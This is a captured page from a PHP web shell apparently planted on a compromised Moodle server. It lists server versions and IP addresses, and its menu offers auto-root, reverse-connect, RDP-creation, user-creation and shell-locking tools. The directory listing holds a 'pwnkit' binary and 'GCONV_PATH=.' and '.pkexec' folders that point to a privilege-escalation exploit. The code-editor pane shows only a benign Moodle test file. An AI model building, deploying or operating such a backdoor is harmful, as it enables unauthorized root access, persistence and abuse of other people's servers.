Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
mod /
glossary /
tests /
behat /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
behat_mod_glossary.php
2.83
KB
-rwxrwxrwx
categories.feature
5.77
KB
-rwxrwxrwx
edit_tags.feature
3.36
KB
-rwxrwxrwx
entries_always_editable.featur...
1.65
KB
-rwxrwxrwx
entries_require_approval.featu...
3.27
KB
-rwxrwxrwx
import_entries.feature
2.17
KB
-rwxrwxrwx
prevent_duplicate_entries.feat...
1.51
KB
-rwxrwxrwx
print_friendly_version.feature
2.35
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
search_entries.feature
3.14
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : behat_mod_glossary.php
<?php // This file is part of Moodle - http://moodle.org/ // // Moodle is free software: you can redistribute it and/or modify // it under the terms of the GNU General Public License as published by // the Free Software Foundation, either version 3 of the License, or // (at your option) any later version. // // Moodle is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU General Public License for more details. // // You should have received a copy of the GNU General Public License // along with Moodle. If not, see <http://www.gnu.org/licenses/>. /** * Steps definitions related with the glossary activity. * * @package mod_glossary * @category test * @copyright 2013 David Monllaó * @license http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later */ // NOTE: no MOODLE_INTERNAL test here, this file may be required by behat before including /config.php. require_once(__DIR__ . '/../../../../lib/behat/behat_base.php'); use Behat\Gherkin\Node\TableNode as TableNode; /** * Glossary-related steps definitions. * * @package mod_glossary * @category test * @copyright 2013 David Monllaó * @license http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later */ class behat_mod_glossary extends behat_base { /** * Adds an entry to the current glossary with the provided data. You should be in the glossary page. * * @Given /^I add a glossary entry with the following data:$/ * @param TableNode $data */ public function i_add_a_glossary_entry_with_the_following_data(TableNode $data) { $this->execute("behat_forms::press_button", get_string('addentry', 'mod_glossary')); $this->execute("behat_forms::i_set_the_following_fields_to_these_values", $data); $this->execute("behat_forms::press_button", get_string('savechanges')); } /** * Adds a category with the specified name to the current glossary. You need to be in the glossary page. * * @Given /^I add a glossary entries category named "(?P<category_name_string>(?:[^"]|\\")*)"$/ * @param string $categoryname Category name */ public function i_add_a_glossary_entries_category_named($categoryname) { $this->execute("behat_general::click_link", get_string('categoryview', 'mod_glossary')); $this->execute("behat_forms::press_button", get_string('editcategories', 'mod_glossary')); $this->execute("behat_forms::press_button", get_string('addcategory', 'glossary')); $this->execute('behat_forms::i_set_the_field_to', array('name', $this->escape($categoryname))); $this->execute("behat_forms::press_button", get_string('savechanges')); $this->execute("behat_forms::press_button", get_string('back', 'mod_glossary')); } }
Close